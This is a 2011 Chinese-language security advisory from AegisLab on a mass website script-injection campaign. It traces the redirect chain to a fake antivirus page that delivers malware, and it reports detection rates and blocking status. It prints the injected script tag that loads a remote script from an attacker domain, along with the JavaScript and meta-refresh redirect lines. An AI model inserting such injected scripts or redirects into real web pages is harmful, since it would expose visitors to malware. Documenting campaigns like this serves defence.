[ 一般 ] 23 十二月, 2011 15:34

    AegisLab 希望來年大家的電腦和手機都平平安安的不要再被駭了! XD ...

[ 安全通報 ] 02 十二月, 2011 15:23

根據 ISC diary 的報導,目前在許多網站出現inject script字串,猜測是針對ASP,IIS和MSSQL攻擊(如圖一):

""></title><script src="hxxp://lilupophilupop.com/sl.php"></script>"

(圖一)
 
該連結的內容更新頻繁,
window.top.location.replace("hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl");

目的都是將使用者導向另一個 hopping site (hxxp://doutl31inesst.rr.nu),
發現的domain都位於ip address(194.28.114.102),還包括:
hxxp://rthur87seeks.rr.nu
hxxp://ift72hbot.rr.nu/

得到的內容如下:
<meta http-equiv="refresh" content="0;url=hxxp://www3.simplerfnetwork.rr.nu/?nhyb3c0y=kt3ixnCYZ6msj93Z0KKljNrYsaifqJHi3OWfZpSWrtacpKCcm6WK" />

透過meta refresh 再將使用者導向另一個網站,顯示假的掃毒畫面,再誘使用者下載惡意檔案(參見圖二),該檔案目前在防毒軟體的偵測率相當低 (16%)。而且為了躲避偵測,當同一個IP造訪第二次時則不會顯示任何內容。

 

 

(圖二)


§ 感染途徑:
[script] hxxp://lilupophilupop.com/sl.php
  [hop] hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl
   [hop] hxxp://www3.simplerfnetwork.rr.nu
    [hop] hxxp://www1.smartscanerjkm.rr.nu
     [download] hxxp://www1.smartscanerjkm.rr.nu

§ Anti-Virus
  * 該下載病毒於 VirusTotal 的偵測率:7/43 (16.3%)
    ( http://www.virustotal.com/file-scan/report.html?id=65246d17abeb6278c7dcfc3fd7d889fbd8bc8c285c5e6c43b3fd21c78b17348e-1322825563 )

§ URL filter
 * Google SafeBrowsing 至今未阻擋上述所有惡意網站
 * WebGuard 自 2011-12-02 起阻擋上述惡意網站
   其中hxxp://www3.simplerfnetwork.rr.nu
      hxxp://www1.smartscanerjkm.rr.nu 分別自上午10:52, 11:23 起阻擋

§ 台灣疑似感染頁面
 根據Google Search結果,台灣地區只發現"勤業眾信人聯誼會" (www.deloitte.com.tw/alumni/) 曾經疑似感染 (見圖三) ,
 但目前已關站維修中。

 

(圖三) 

By AegisLab